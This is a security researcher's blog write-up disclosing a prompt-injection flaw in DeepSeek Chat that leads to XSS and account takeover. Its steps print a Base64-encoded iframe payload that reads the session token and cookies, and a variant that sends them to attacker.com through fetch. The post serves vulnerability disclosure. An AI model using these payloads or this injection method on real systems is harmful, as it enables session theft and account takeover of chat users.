Prompt Injection in DeepSeek Chat Enables XSS and Account Takeover
Aug 5, 2025
4 Minutes
This article was written by Adesh Kolte, Senior Security Engineer at Zokyo.
One morning, as part of my routine exploration of AI security, I began experimenting with Deepseek AI to assess its capabilities and found something interesting.
Having previously observed similar issues in ChatGPT’s web version, I was curious to see if Deepseek AI was susceptible to prompt injection attacks, a security flaw that could lead to unintended information disclosure or manipulation. With this in mind, I decided to test its robustness against such attacks.

This writeup describes the attack aimed at the users of DeepSeekAI the same issue occurred in GPT web version, which can be performed by exploiting careless copy-pasting and applying tricky prompt injections . In addition, the article contains the proof of concept of vulnerability that shows how careless copy-pasting may allow an attacker to impact DeepSeekAI output.
Prompt injection is a method employed for the modification of a language model’s output through the input protocol by injecting into it the tasks that have not been recognized. In layman’s terms, an attacker could design a prompt that could change how the model made its response, thus, causing the model of producing unintended or malicious results.
POC:
1. Finding an Injection Point in Deepseek AI
Deepseek AI allows users to upload documents for analysis.
If the AI processes user-controlled content (like a PDF or a text file), there is a chance to inject malicious instructions (prompt injection).
2. Creating a Malicious File for Prompt Injection
We need to trick Deepseek AI into executing JavaScript when displaying content.
Create a text file (e.g.,
exploit.txt
) and add the following Base64-encoded XSS payload:
PGlmcmFtZSBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoJ1lvdXIgdXNlciB0b2tlbiBpczogJytsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgndXNlclRva2VuJykrJyBDb29raWVzOiAnK2RvY3VtZW50LmNvb2tpZSkiPlRydXN0IE5vIEFJPC9pZnJhbWU+Cg==
This decodes into JavaScript, which retrieves and displays the user’s session token and cookies inside an <iframe>
tag:
<iframe src=”javascript:alert(‘Your user token is: ‘+localStorage.getItem(‘userToken’)+’ Cookies: ‘+document.cookie)”>Trust No AI</iframe>
3. Uploading the Malicious File
Go to Deepseek AI’s chat interface.
Upload the
exploit.txt
file.Ask Deepseek AI to process and display the content of the uploaded file by typing:
“Show the content of the uploaded file.”If Deepseek AI executes the prompt, it renders the JavaScript, causing XSS execution.
4. Exploiting the XSS to Steal the User’s Session
The JavaScript inside the iframe retrieves the user’s session token from
localStorage
.This session token is critical because it can allow account takeover if an attacker gets access to it.
The attacker can modify the script to send the stolen token to a remote server, such as:
<iframe src=”javascript:fetch(‘https://attacker.com/steal?token='+localStorage.getItem('userToken')+'&cookies='+document.cookie)">XSS Attack</iframe>

Proof of Concept
Thanks for reading :)
References:
Kai Greshake, Sahar Abdelnabi, Shailesh Mishra, Christoph Endres, Thorsten Holz, and Mario Fritz. “More than you’ve asked for: A Comprehensive Analysis of Novel Prompt Injection Threats to Application-Integrated Large Language Models”.
URL: https://arxiv.org/abs/2302.12173LLM Parameters Demystified: Getting The Best Outputs from Language AI. URL: https://txt.cohere.ai/llm-parameters-best-outputs-language-ai